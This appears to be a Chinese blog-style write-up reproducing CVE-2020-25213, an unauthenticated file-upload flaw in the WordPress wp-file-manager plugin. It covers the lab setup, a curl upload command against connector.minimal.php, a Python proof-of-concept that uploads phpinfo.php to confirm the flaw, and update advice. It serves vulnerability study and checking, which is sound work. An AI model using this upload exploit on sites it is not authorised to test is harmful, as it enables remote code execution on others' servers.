0x01 漏洞概述
WordPress是一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。而WordPress的插件(wp-file-manager)6.9版本之前存在安全漏洞,该漏洞允许远程攻击者上传和执行任意PHP代码。攻击者可利用该漏洞执行任意代码。
0x02 影响版本
WordPress 文件管理器(wp-file-manager)插件 6.0-6.8 版本
0x03 环境搭建
- phpstudy2018
- WordPress
https://wordpress.org/download/
- wp-file-manager 6.0版本
https://wordpress.org/plugins/wp-file-manager/advanced/
①将WordPress启动安装程序
- 安装教程参考链接:
https://codex.wordpress.org/zh-cn:%E5%AE%89%E8%A3%85_WordPress
- 搭建成功后的WordPress首页
- 进入管理员后台安装wp-file-manager 6.0插件
http://YourIP/wordpress/wp-admin/plugin-install.php
将插件安装完如下:
http://YourIP/wordpress/wp-admin/plugins.php
0x04 漏洞复现
- 浏览器访问
http://YourIP/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
出现下面到的error说明漏洞存在
- 使用curl命令将本地文件用POST方法上传
curl -F cmd=upload -F target=l1_ -F upload[]=@test.php -XPOST "http://YourIP/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
test.php文件内容:
- 访问上传的文件查看
上传路径:
http://YourIP/wordpress/wp-content/plugins/wp-file-manager/lib/files/test.php
0x05 漏洞POC
# -*- coding:utf-8 -*- import requests import json headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) " "Chrome/91.0.4472.124 Safari/537.36 " } url_tail = "/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php" def Check_1(url): url_2 = url + url_tail res1 = requests.get(url=url_2, headers=headers) text1 = res1.text text2 = json.loads(text1) key = json.dumps(text2) # 将text2转换为字符串 print(text2) key1 = "errUnknownCmd" if key1 in key: print("疑似漏洞存在") Next = input("是否进一步验证: Y or N :") if Next == "Y": Check_2(url) else: print("漏洞不存在") def Check_2(url): data = { 'cmd': 'upload', 'target': 'l1_', } files = { 'upload[0]': open('phpinfo.php', 'rb'), } url_3 = url + url_tail res = requests.post(url=url_3, headers=headers, data=data, files=files, verify=False) if res.status_code == requests.codes.ok: # print("上传成功!") d = res.json() p = d.get('added', [])[0].get('url') Finally_url = f'{url}{p}' res2 = requests.get(url=Finally_url, headers=headers) key2 = "PHP Version" if key2 in res2.text: print("CVE-2020-25213漏洞存在!") else: print("漏洞不存在!") def main(): url_1 = input("输入测试的URL:") Check_1(url_1) if __name__ == '__main__': main()
刚开始学习写POC,有哪里有问题的欢迎大佬们指出_(:з」∠)_
0x06 修复建议
更新wp-file-manager插件至6.9或更高版本